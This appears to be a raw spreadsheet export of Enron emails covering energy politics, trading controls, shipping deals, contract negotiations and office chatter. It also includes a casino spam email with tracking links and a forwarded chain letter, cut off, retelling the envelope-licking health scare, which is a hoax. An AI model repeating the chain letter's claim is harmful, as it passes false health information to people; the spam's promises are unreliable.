PG&amp;E also supports Burton's bill, which is very likely to pass the Assembly and which the governor will likely have to sign.  If this bill is signed, PG&amp;E's legal challenges to the DWR and PUC may be canceled.  The popularity of Burton's bill (as opposed to the rate agreement from the Governor) is leading many observers to conclude that Burton has replaced Davis as the most powerful, influential politician in California._x000D_
 _x000D_
Burton's goal is to ensure that any direct access that is offered to large users in 2003 (when there will be a dip in power procurement by DWR, resulting in a net short) is only temporary and does not turn into a "jail break."  DWR's power procurement will rise again in 2004; Burton wants to ensure that businesses will have to return to purchasing power from DWR at that time._x000D_
 _x000D_
The CTMA is opposed to Burton's bill and to the bailout if no direct access is offered.  The CTMA wants its members to be able to escape from buying power from the DWR (and therefore paying off the bonds) permanently in 2003._x000D_
</t>
  </si>
  <si>
    <t>Sat, 2 Feb 2002 20:08:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Up to $150.00 in FREE Chips From Grand Banks Casino</t>
  </si>
  <si>
    <t>Saturday, February 2, 2002_x000D_
_x000D_
************************************************************_x000D_
GET UP TO $150 FREE - RIGHT NOW!!!_x000D_
************************************************************_x000D_
_x000D_
If you're looking for looking for BIG action and even BIGGER payouts -_x000D_
Grand Banks Casino_x000D_
http://www.emailfactory.com/redirect.cfm?key=7B232067DBF144EB889C646E6612B481-25537-1239&amp;redirect=www.grandbankscasino.com/default.asp?sc+1789-3_x000D_
is where you want to be._x000D_
_x000D_
At Grand Banks, all new players qualify for a FREE up to $150 Initial_x000D_
Deposit bonus! So if your game is Black Jack, Video Poker, Slots, Craps_x000D_
- Grand Banks has 32 state-of-the-art adrenaline pumping, heart-stopping_x000D_
games. And you can play for fun while you hone your 'Gambler's' instinct_x000D_
or go for the real deal and play for cash. And because luck can be a_x000D_
lady day or night - Grand Banks Casino is open 24 hours a day, 7 days a_x000D_
week._x000D_
_x000D_
Discover Grand Banks Casino_x000D_
http://www.emailfactory.com/redirect.cfm?key=7B232067DBF144EB889C646E6612B481-25537-1239&amp;redirect=www.grandbankscasino.com/default.asp?sc+1789-3._x000D_
Cash-in on the fun. Cash-in on thewinnings. Grand Banks Casino also_x000D_
offers all real money players 'Red Carpet Rewards' - The fastest way to_x000D_
earn FREE_x000D_
chips! Every $10 in real money wagers earns you one Red Carpet point._x000D_
Redeem 100 points for a FREE house chip - It's that simple!_x000D_
_x000D_
Grand Banks Casino unique Express Payout means players stay liquid, so_x000D_
they stay in the game. Players get paid in less than two weeks - which_x000D_
is a lot faster than anyone in the business. And every transaction is_x000D_
secure - that's one thing Grand Banks Casino_x000D_
http://www.emailfactory.com/redirect.cfm?key=7B232067DBF144EB889C646E6612B481-25537-1239&amp;redirect=www.grandbankscasino.com/default.asp?sc+1789-3_x000D_
doesn't gamble on. Security is air-tight._x000D_
_x000D_
Get in on the action. Get your FREE up to $150 right now! The tables are_x000D_
waiting for you!_x000D_
_x000D_
For your convenience Grand Banks Casino accepts Visa, Mastercard,_x000D_
Firepay and Paypal._x000D_
_x000D_
Visit Grand Banks Casino_x000D_
http://www.emailfactory.com/redirect.cfm?key=7B232067DBF144EB889C646E6612B481-25537-1239&amp;redirect=www.grandbankscasino.com/default.asp?sc+1789-3_x000D_
right now!_x000D_
_x000D_
************************************************************_x000D_
_x000D_
_x000D_
-----------------------------------------------------------------------_x000D_
-----------------------------------------------------------------------_x000D_
_x000D_
This email sent by http://www.EmailFactory.com_x000D_
The Web-Based Precision Opt-In Email Marketing Solution._x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
----------------------------------------------------------------------------_x000D_
To UNSUBSCRIBE from this mailing list:_x000D_
_x000D_
Reply to this message with the word 'unsubscribe' as the subject_x000D_
_x000D_
 OR_x000D_
_x000D_
To UNSUBSCRIBE from this mailing list, go to:_x000D_
_x000D_
http://bye.emf3.com/handler.cfm?idAddress=L3363056607.25537_x000D_
----------------------------------------------------------------------------_x000D_
----------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Official Books</t>
  </si>
  <si>
    <t xml:space="preserve">Mike,_x000D_
_x000D_
The reason my mistake was not caught on the benchmark signoff procedure is _x000D_
that the postid in question did not have a net position.  The procedure _x000D_
Rahmann showed you is where we check GERMS positions to the position reports _x000D_
we run using Excel queries.  If a postid has a net position and is not _x000D_
officialized, it will be caught using this procedure.  It will not, however, _x000D_
if the postid does not have a position.  I understand the importance of _x000D_
officializing postid's, as does the entire West desk.  Thanks._x000D_
_x000D_
DG    3-9573_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 10/16/2000 _x000D_
11:07 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Jeffrey C Gossett                           10/16/2000 11:02 AM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Official Books_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 10/16/2000 _x000D_
11:01 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Michael E Moscoso                           10/16/2000 10:14 AM_x000D_
	_x000D_
_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Official Books_x000D_
_x000D_
Jeff,_x000D_
_x000D_
FYI - Darron Giron didn't officialize the West-NW-GDL book on Friday.  Please _x000D_
re-emphasize the importance of not forgetting.  Also, Rahmann showed me a _x000D_
control he has to catch books not officialized each night which looked like _x000D_
an effective tool.  I wonder why he didn't see this book on Friday._x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Michael E Moscoso/HOU/ECT on 10/16/2000 _x000D_
10:11 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Michael E Moscoso                           10/16/2000 09:59 AM_x000D_
	_x000D_
_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT, Stacey W White/HOU/ECT@ECT, John _x000D_
Swinney/HOU/ECT@ECT, Eric Groves/HOU/ECT@ECT, Tracy Beardmore/NA/Enron@Enron, _x000D_
Scott Mills/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Official Books_x000D_
_x000D_
We have been tracking books that are not officialized on a daily basis.  This _x000D_
list goes to Sally Beck and is reviewed at the end of each week by Rick Buy.  _x000D_
Rick has been vocal about taking corrective action if people forget to _x000D_
officialize.   It is imperative that we take extra care to ensure that all _x000D_
books are marked official each night before going home.  A control process _x000D_
should be implemented immediately to absolutely avoid being on the list.  _x000D_
_x000D_
Please contact me if you have any questions (x-35242)._x000D_
_x000D_
Thanks,_x000D_
Mike _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EnronOnline Executive Summary for December 11, 2000</t>
  </si>
  <si>
    <t>Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
EnronOnline Executive Summary for 12/11/00_x000D_
Transaction Summary	_x000D_
External Transactions Today	3,781_x000D_
Average Daily External Transactions (30 day Trailing Avg)	4,357_x000D_
Total Life to Date Transactions	515,690_x000D_
_x000D_
EnronOnline Daily % of Entity's Total Transactions for 12/11/00	Trans	Percent_x000D_
Enron North America	2,932	77%_x000D_
Enron Europe Limited	171	35%_x000D_
Global Products	195	36%_x000D_
Enron Metals	483	15%_x000D_
_x000D_
EnronOnline Percentage of Total Corporate Transactions _x000D_
(30 day Trailing Avg)	55%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	2,754,492,066_x000D_
MTD	30,628,446,748_x000D_
LTD	309,798,863,793_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	3,411,749,354_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	20,508,644,681_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	603_x000D_
New Counterparties transacting for the first time today	1_x000D_
Number of Products Offered Today	1,107_x000D_
Total Number of External Users Logged on Today	3,328_x000D_
Average # of External Users logged on (30 day Trailing Avg)	2,963</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 05:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron / HPL Nom for November 18, 2000</t>
  </si>
  <si>
    <t>(See attached file: HPLN1118.xls)_x000D_
_x000D_
 - HPLN1118.xls</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wheeling Pitt consignment</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
Credit appears to be a problem on this deal.  Therefore, please stand by for _x000D_
further developments.  _x000D_
_x000D_
I appreciate your very quick response.  Apparently, my client was satisified _x000D_
with the service he received._x000D_
_x000D_
Kay_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: J-Block Update</t>
  </si>
  <si>
    <t xml:space="preserve">John, any chance you can sent this e-mail to me?  Apparently it has a _x000D_
"confidential" stamp on it, so even though I have access to Jeff's mailbox, _x000D_
it won't allow me to open it.  Unfortunately, Jeff does not check his own _x000D_
e-mail, and if I go into his machine, I won't be able to print it as it is _x000D_
not connected to any printer._x000D_
_x000D_
Thanks, John.  I'll see that Jeff gets it as soon as it's received.  SRS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Sherriff@ECT_x000D_
11/06/2000 12:43 AM_x000D_
To: Jeff Skilling/Corp/Enron@ENRON, Mark Frevert/NA/Enron@Enron_x000D_
cc: Mike McConnell/HOU/ECT@ECT, Greg Whalley/HOU/ECT@ECT, Richard _x000D_
Lewis/LON/ECT@ECT, Peter Crilly/LON/ECT@ECT, Michael Brown/LON/ECT _x000D_
_x000D_
Subject: J-Block Update_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 01:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">print_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 10/10/2000 _x000D_
08:59 AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp. - Europe_x000D_
	_x000D_
	From:  Chris Connelly                           10/08/2000 01:55 PM_x000D_
	_x000D_
_x000D_
To: George McClellan/HOU/ECT@ECT, Stuart Staley/LON/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Kevin _x000D_
McGowan/Corp/Enron@ENRON, Tom Mcquade/HOU/ECT@ECT_x000D_
cc: Peter Bradley/LON/ECT@ECT, Jez Peters/LON/ECT@ECT, Candace _x000D_
Parker/LON/ECT@ECT, Kenny Nicoll/LON/ECT@ECT, Dimitri Taylor/LON/ECT@ECT _x000D_
Subject: Freight weekly report_x000D_
_x000D_
_x000D_
Enron Shipping Services Weekly report 39/2000_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Highlight_x000D_
Had a meeting with Bocimar in our offices this week as they were interested _x000D_
in knowing our plans with ABC.  From meeting it became very clear that they _x000D_
were out of the running for ABC as they were unwilling to purchase that _x000D_
company without a significant discount to current market levels.  Few days _x000D_
later, met with CEO of ABC as he had just received a bid from a rival _x000D_
shipping company ( Zodiac ) and he was basically begging us to join the _x000D_
bidding as he really did not want his company  to fall in the hands of _x000D_
Zodiac.  Pierre and I continued to express our interest in ABC but told him _x000D_
that we needed more time to evaluate their assets and could not counter on _x000D_
such short notice.  Told ABC that we would continue to follow with interest _x000D_
and that if buy out by Zodiac failed, we would come back to discuss.  Our _x000D_
goal all along was to make sure that Bocimar were not going to get their _x000D_
hands on ABC or they would have effectively controlled 50 % of the spot cape _x000D_
fleet and made our short position into next year look worrisome.  Having _x000D_
shown interest we not only were kept well advised as to what Bocimar was up _x000D_
to but it could have reacted quickly to protect our position.  We are _x000D_
relatively pleased with the potential of Zodiac buying ABC. _x000D_
_x000D_
Also, this week we fixed another Coeclerici cape for period.  We fixed the _x000D_
cape Asia build in 1990 for minimum 4-6 months to allow us to use the vessel _x000D_
to load out of Australia for CLP in December and hedge ourselves against a _x000D_
late winter surge in cape rates but we have the added advantage of having an _x000D_
option for a further two years to be declared mid January 2001.  We bought _x000D_
ourselves a very cheap call option with an exercise date in three months time _x000D_
in a very volatile market.  Further, Coeclerici gave us a put in year two to _x000D_
cap our downside and gave us a call option to extend the deal into an _x000D_
additional third year .  We are currently discussing with Bocimar the idea of _x000D_
putting that cape into their pool if they secure us a floor for year one and _x000D_
a share in any upside.  Will keep you posted  !!!_x000D_
_x000D_
_x000D_
Fixed a 6 panamax contract as vessel owner with National power from South _x000D_
Africa to Bristol with option Immingham to give us a very useful short _x000D_
position into next year in the panamax sector.  This deal will add to our _x000D_
already significant business in South Africa for next year and will allow us _x000D_
to arbitrage between cape and panamax vessels as we hold contracts in both _x000D_
sectors.  _x000D_
_x000D_
Furthermore, Intercore has asked us to offer them 6 capes from Bolivar into _x000D_
ARA from next March till September which if we were to win the contract would _x000D_
make us a definite market maker in the two busiest coal routes ( RBCT/ARA and _x000D_
COLOMBIA/ARA ).  _x000D_
_x000D_
_x000D_
Market_x000D_
	Short term	Medium term	Long Term_x000D_
Handy Max	Down	Flat	Flat_x000D_
Panamax	Down	Down	Down_x000D_
Cape Size	Flat	Flat	Flat_x000D_
_x000D_
_x000D_
Panamax : Market continues to fall for balance of the year as China/Asia was _x000D_
on holiday this week and fixings were relatively few _x000D_
Capes : Market is steady but few expect a fall in rates for balance of 2000.  _x000D_
Owners and charterers waiting for coal trans to fix for next year._x000D_
_x000D_
Deals Done_x000D_
Physical Freight_x000D_
ECS freight _x000D_
Fixed  2+1 geared panamaxes from Indo to Hong Kong for November to January _x000D_
2001 at $6.35._x000D_
Agreed window of 12-21 November with MOSK for Drummond-Redcar lifting_x000D_
Fixed a panamax for late October loading from Drummond to LBT at $9.80 with _x000D_
Bell ships_x000D_
Sold a cape to the coal desk from Bolivar to Rotterdam at $6.85 for q3 next _x000D_
year_x000D_
_x000D_
Third parties freight deals_x000D_
As mentioned above structuring a deal with Coeclerici and Bocimar_x000D_
Fixed 6 panamaxes from RBCT to UK ports for National Power for all of 2001 at _x000D_
around $10_x000D_
Trying to sell 4 capes to Billiton from RBCT to Rotterdam and again  buying _x000D_
same deal with Coeclerici as a back to back with some profit._x000D_
_x000D_
_x000D_
OTC _x000D_
FFA s_x000D_
No trades_x000D_
      _x000D_
EOL_x000D_
No trades this week but EOL trader joining our group Thursday and new routes _x000D_
to be added shortly which should add liquidity and new players._x000D_
_x000D_
Miscellaneous_x000D_
Our position as it stands now is short about 350,000 tons for balance of 2000 _x000D_
mostly attributed to our November/December Colombia/LBT panamax short.  For _x000D_
cal 01 we are 6.2 million tons short and cal 02 1.7 million short and cal 03 _x000D_
about 400,000 tons short.  These figures do not take into account our two _x000D_
Coeclerici cape deals as those have not been finalised with counterparty and _x000D_
have not been booked as of yet_x000D_
_x000D_
Travels_x000D_
Pierre is in Asia all week and I am in the office_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Mar 2002 15:14:40 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
RIGZONE DAILY NEWS -- WEDNESDAY, MARCH 6, 2002_x000D_
------------------------------------------------------------_x000D_
Daily News from the worldwide upstream oil &amp; gas industry_x000D_
   to view the complete version, please go to: _x000D_
   http://www.rigzone.com/newsletter_show.asp?n_id=238_x000D_
------------------------------------------------------------</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 07:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Wednesday Morning Meetings</t>
  </si>
  <si>
    <t xml:space="preserve">Wednesday morning is the only time I will be in the office all week and is _x000D_
already fully booked.  Will you be in San Antonia later?  Maybe we can meet _x000D_
then._x000D_
_x000D_
_x000D_
_x000D_
	Michael Guerriero@ENRON_x000D_
	11/13/2000 07:32 AM_x000D_
		 _x000D_
		 To: Andy Zipper/Corp/Enron@Enron, Jeffrey E _x000D_
Sommers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Taylor/HOU/ECT@ECT, Joe _x000D_
Kishkill/SA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Wednesday Morning Meetings_x000D_
_x000D_
I will be in Houston Wednesday morning and would like to see if I could get _x000D_
on your schedules for 45 minutes to discuss current Argentina issues. I will _x000D_
ask my assistant Maria Jose Minguillion to contact each of you to see if this _x000D_
is convenient_x000D_
_x000D_
Joe maybe we could have an early coffee of late evening discussion._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
MFG_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 08:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Six Flags Over Texas</t>
  </si>
  <si>
    <t>I can't hear you!! La La La La La La La.....................</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 13:30:02 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Enron assets</t>
  </si>
  <si>
    <t xml:space="preserve">So how come no one will buy for $5b?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sole III, Carlos  _x000D_
Sent:	Thursday, November 29, 2001 3:29 PM_x000D_
To:	Mann, Kay_x000D_
Subject:	Enron assets_x000D_
_x000D_
I was reading something on how we will be the biggest bankruptcy ever and have a great degree of comfort about our reorg.  Apparently, our debt is only in the neighborhood of $16 billion and as of September, our books had our assets valued at nearly $61 billion !  </t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:36:57 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">nope_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 11:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i'm funny.  don't you think?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 11:34 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
jerk_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 11:31 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ya think?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 02:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'juan.padron@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'doug.gilbert-smith@enron.com', 'clint.dean@enron.com', 'george.hopley@enron.com', 'lloyd.will@enron.com', 'tamara.black@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Vacation Time</t>
  </si>
  <si>
    <t>Please be advised that I will be out on vacation next week, 18-22 of _x000D_
Dec.....  I will be in a rural part of M,xico where there are no phones.... _x000D_
but I will call in when I go to a town/city where phones are available.</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 04:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NUI Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Not sure if you had this..._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Breese, Mark  _x000D_
Sent: Monday, April 16, 2001 11:25 AM_x000D_
To: Rohauer, Tanya_x000D_
Subject: NUI Agreements_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/16/2001 11:24 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Paul Chymiy &lt;pchymiy@NUI.com&gt; on 04/16/2001 09:44:35 AM_x000D_
To: Stacy.E.Dickson@enron.com, Mark.Breese@enron.com_x000D_
cc: Brian Rose &lt;brose@NUI.com&gt;, Jennifer Forno &lt;jforno@NUI.com&gt;, Laura _x000D_
DiBenedetto &lt;ldibenedetto@NUI.com&gt;, Terri Sue Gross &lt;tgross@NUI.com&gt; _x000D_
Subject: NUI Agreements_x000D_
_x000D_
_x000D_
 I though it might be helpful to review where we stand on the various_x000D_
agreements:_x000D_
_x000D_
 1. Enfolio Agreement between NUI Utilities and ENA - The version_x000D_
(including all Exhibits) that Stacy sent on April 11 (5:23 p.m.) is the_x000D_
final and is acceptable.  I have asked Terri Sue to forward NUI's Notice_x000D_
Information (Exhibit A) to Stacy.  Stacy, upon receipt, can you please_x000D_
generate the final agreement?_x000D_
 2. Physical Transaction Agreement - I need to review Section 4 with_x000D_
Bob Lurie who will be back in the office tomorrow._x000D_
 3. April Transaction Confirmation Letter - Stacy, this letter should_x000D_
be addressed to Thomas E. Smith, Director, Energy Planning (who signed the_x000D_
Confirmation).  Also, please confirm that the Exhibits are NUI Confirmation_x000D_
Nos. 31060 and 46669._x000D_
 3. Swap Transaction Agreements - I am attaching a revised version of_x000D_
the Transaction Agreement and Exhibit for Swap V09140.4 from Enron's review._x000D_
As Mark and I discussed, NUI Corporation, not NUI Utilities, will be the_x000D_
Guarantor. In addition, I have modified the form of Guaranty to make it_x000D_
clear that it only applies to these two Swaps; this is similar to what Enron_x000D_
had agreed to when we were contemplating an NUI Corp. Guaranty for the_x000D_
Enfolio Agreement.  I have made this change to the Guaranty because I am not_x000D_
satisfied that the discussion within the Confirmation that purports to limit_x000D_
the scope of the Guaranty is sufficient.  I think the limitations need to be_x000D_
set forth within the four corners of the Guaranty itself.   If acceptable,_x000D_
the same changes should be made to the Transaction Agreement and Exhibit for_x000D_
Swap V09140.5._x000D_
 &lt;&lt;ENA Swap Confirm Red 4-16-01.doc&gt;&gt;_x000D_
_x000D_
 - ENA Swap Confirm Red 4-16-01.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 16:16:39 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
fyi_x000D_
 -----Original Message-----_x000D_
From: 	Shankman, Jeffrey A.  _x000D_
Sent:	Monday, November 05, 2001 6:11 PM_x000D_
To:	Mcconnell, Mike; Bowen Jr., Raymond; Delainey, David W._x000D_
Cc:	Lawyer, Larry_x000D_
Subject:	_x000D_
_x000D_
We are asking Barclays for 7 days to work out the SO2 inventory, which they are taking to their credit committee tomorrow.  We will have a response by noon our time.  _x000D_
_x000D_
I'll update everyone then._x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 04:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Escrow agreement</t>
  </si>
  <si>
    <t>Please email me the execution version of the escrow agreement.  Are we using _x000D_
one, two or three?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wentapb@sprintmail.com'})</t>
  </si>
  <si>
    <t>RE: BABY!</t>
  </si>
  <si>
    <t>have not moved yet...... so still the same....713-807-7057</t>
  </si>
  <si>
    <t>Tue, 18 Jan 2000 10:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dayton Stuff</t>
  </si>
  <si>
    <t>deals 151877 and 151878</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 02:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>E-Signature Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Bob:  This is something we are working on at Enron.  Is this something ISDA _x000D_
has interest in taking a lead on?  I think ISDA could add value by developing _x000D_
a standard approach to e-signatures._x000D_
_x000D_
Mark_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 06/30/2000 09:11 AM -----_x000D_
_x000D_
	Alan Aronowitz_x000D_
	06/27/2000 05:31 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: E-Signature Protocol_x000D_
_x000D_
Mark:_x000D_
_x000D_
Pursuant to our discussion last week, below is a rough draft of a proposal _x000D_
for an electronic signature protocol, which could be presented to ISDA for _x000D_
further consideration and discussion after we have further discussed:_x000D_
_x000D_
E-Signature Protocol_x000D_
_x000D_
Objective: In light of the enactment of the US federal legislation on _x000D_
electronic signatures (effective as of 10/1/00), a simple, reliable, and _x000D_
enforceable protocol should be established to facilitate the electronic _x000D_
execution of Master Agreements (and confirmations where required).  To _x000D_
facilitate the wider use of electronic contracts, this protocol could be _x000D_
endorsed by ISDA. Hopefully, it would become a standard that others would use _x000D_
for all types of contracts. Perhaps, if necessary or helpful, the adoption of _x000D_
the protocol could be done electronically by each party unilaterally agreeing _x000D_
to abide by it, possibly using the same type of approach ISDA used in _x000D_
connection with the introduction of the EMU currency a few years ago.  _x000D_
Initially, the protocol would be primarily applicable to U.S. counterparties, _x000D_
but it could be expanded to non-U.S. counterparties as e-signature laws like _x000D_
the new U.S. law are enacted across the globe._x000D_
_x000D_
Basic Protocol:  By adopting the protocol, each counterparty would agree that _x000D_
the relevant agreement may be electronically signed by complying with the _x000D_
following steps:_x000D_
_x000D_
1) The parties negotiate and agree on a final form the relevant agreement, _x000D_
and appoint one of the parties ("First Party") to prepare the document for _x000D_
electronic signature;_x000D_
_x000D_
2) The First Party prepares the final form in the PDF format (e.g., the body _x000D_
of the text could not be modified) with the exception of the blank signature _x000D_
blocks for each party to be placed on the last page of the agreement;_x000D_
_x000D_
3) An authorized signatory of the First Party electronically signs the _x000D_
agreement (Note: this electronic signature could be accomplished by _x000D_
inscribing an electronic handwritten signature or the signatory typing in _x000D_
his/her name and title in the blank signature block);_x000D_
_x000D_
4) The agreement, as electronically signed by the First Party, is sent via _x000D_
electronic means (e.g., by e-mail) by the First Party to the other party _x000D_
("Second Party");_x000D_
_x000D_
5) An authorized signatory of the Second Party  electronically signs the _x000D_
agreement (Note: this electronic signature could be accomplished by _x000D_
impressing an electronic handwritten signature or the signatory typing in _x000D_
his/her name and title in the signature block);_x000D_
_x000D_
6) The agreement, as electronically signed by the Second Party, is sent via _x000D_
electronic means (e.g., by e-mail) by the Second Party to the First Party, _x000D_
accordingly, creating the fully executed agreement; and_x000D_
_x000D_
7) Each party would be responsible for maintaining in its own electronic _x000D_
archives the agreement as electronically signed by the parties._x000D_
_x000D_
Also, the following could be considered: (a) adding to the protocol that each _x000D_
party,by adopting the protocol, agrees to be bound by any agreement entered _x000D_
into by means of the protocol, and any other appropriate language to enhance _x000D_
the enforceability of the "e-signature" process and (b) adding to the _x000D_
preprinted form of the Master Agreement, a provision whereby each party _x000D_
adopts the electronic signature protocol endorsed by ISDA as in effect from _x000D_
time to time._x000D_
_x000D_
Mark, I would be happy to discuss this draft proposal with you further at _x000D_
your convenience._x000D_
_x000D_
_x000D_
_x000D_
Regards, Alan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 08:26:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>REMINDER:   Training Schedule for Outlook:  Wednesday, Thursday,_x000D_
 Friday THIS WEEK</t>
  </si>
  <si>
    <t xml:space="preserve">This is a reminder that the following training is available starting today and available Thursday and Friday.  The training room has changed to the Cascade Conference Room._x000D_
_x000D_
It is a great opportunity to take advantage of professional training on Outlook!  Anyone using laptops will want to go to one of the sessions, and it is recommended that all Enron administrative staff attend one of the sessions.  If you have any questions, please contact Dave Steiner or me._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Davidson, Debra  _x000D_
Sent:	Monday, May 07, 2001 6:48 PM_x000D_
To:	Portland West Desk_x000D_
Subject:	Training Schedule for Outlook:  Wednesday, Thursday, Friday THIS WEEK_x000D_
_x000D_
Dave Steiner has made arrangements for Outlook training for the Portland office this week.  The morning sessions are three hours long and are useful for those who need to have a thorough knowledge of Outlook, for example travelers who use laptops may want to attend as well as the administrative staff.  The afternoon sessions will provide an overview of Outlook and instructors will be on hand to answer questions. Each session will accommodate 15 students and the training is on a first-come, first-serve basis.  The schedule is listed below._x000D_
_x000D_
Wednesday, May 9 - Mt. Hood Conference Room_x000D_
8:30 a.m. - 11:30 a.m. _x000D_
1:00 p.m. -  2:30 p.m._x000D_
3:30 p.m. -  5:00 p.m._x000D_
_x000D_
Thursday, May 10 - Mt. Hood Conference Room_x000D_
8:30 a.m. - 11:30 a.m. _x000D_
1:00 p.m. -  2:30 p.m._x000D_
3:30 p.m. -  5:00 p.m._x000D_
_x000D_
Friday, May 11 - Mt. Hood Conference Room_x000D_
8:30 a.m. - 11:30 a.m. _x000D_
1:00 p.m. -  2:30 p.m._x000D_
3:30 p.m. -  5:00 p.m._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 07:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ughhh!!! don't lick that envelope</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Andrea Ring/HOU/ECT on 12/20/2000 03:00 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Karen D McIlvoy                           12/20/2000 02:20 PM_x000D_
	_x000D_
_x000D_
To: merenolan@mediaone.net_x000D_
cc:  (bcc: Andrea Ring/HOU/ECT)_x000D_
Subject: ughhh!!! don't lick that envelope_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Yikes!_x000D_
&gt;_x000D_
&gt; If you lick your envelopes...You won't anymore!!!!!_x000D_
&gt; A woman was working in a post office in California, one day she licked_x000D_
&gt; the envelopes and postage stamps instead of using a sponge. That very_x000D_
&gt; day the lady cut her tongue on the envelope. A week later, she noticed_x000D_
&gt; an abnormal swelling of her tongue. She went to the doctor, and they_x000D_
